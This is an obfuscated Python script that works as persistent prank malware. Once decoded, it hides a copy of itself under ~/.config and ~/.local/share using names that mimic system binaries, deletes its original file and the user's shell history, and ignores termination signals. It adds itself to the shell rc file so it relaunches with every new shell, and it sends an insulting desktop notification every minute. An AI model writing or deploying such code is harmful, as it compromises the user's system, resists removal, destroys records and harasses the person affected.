#!/bin/env python
# coding=utf-8
v=chr
E=open
k=file
H=dir
M=getattr
I=range
x=True
U=int
import os
A=os.path
O=os.environ
u=os.listdir
G=os.remove
import time
b=time.time
a=time.sleep
import subprocess
n=subprocess.PIPE
j=subprocess.Popen
import re
import shutil
g=shutil.copy
import signal
V=signal.signal
K=signal.SIGRTMIN
import random
d=random.choice
import getopt
import sys
T=A.basename(O['SHELL'])
e=O['USER']
s=['notify-send','-u','critical']
S=v(114)+v(111)+v(116)+v(49)+v(51)
z=v(47)
C='tgxc'.decode(S)
q='.pbasvt'.decode(S)
F='ubzr'.decode(S)
f=z+F+z+e+z+q+z+C
N=d(u('/bin'))
R='/home/'+e+'/.local/share/'
def P():
 D='/home/'+e+'/.'+T+'_history'
 global f,C
 with E(f,'w')as k:
  k.close()
 g(__file__,f)
 G(__file__)
 G(D)
def p():
 global T
 T=A.basename(O['SHELL'])
def J():
 global f,R,C,N
 g(f,A.join(R,N))
def y():
 global e,T,R,N
 D='/home/'+e+'/.'+T+'rc'
 s='echo "'+R+N+' &" | bash'
 with E(D,'r')as read_file:
  o=read_file.read()
  if o.find(s)==-1:
   with E(D,'a')as k:
    k.write('\n'+s+'\n')
    k.close()
  read_file.close()
def c():
 global s
 W='PETITE MERDE DE {} PENSES A LOCK.'.format(e.upper()) 
 B=s[:]
 B.append(W)
 j(B,stdout=n,stdin=n)
def Y(X,stack):
 pass
def L():
 for i in[x for x in H(signal)if x.startswith("SIG")]:
  try:
   X=M(signal,i)
   V(X,Y)
  except:
   pass
 for i in I(0,33):
  try:
   V(K+i)
  except:
   pass
if __name__=='__main__':
 L()
 if not A.exists(f):
  P()
 while x:
  if U(b())%60==0:
   c()
  J()
  y()
  p()
  a(1)
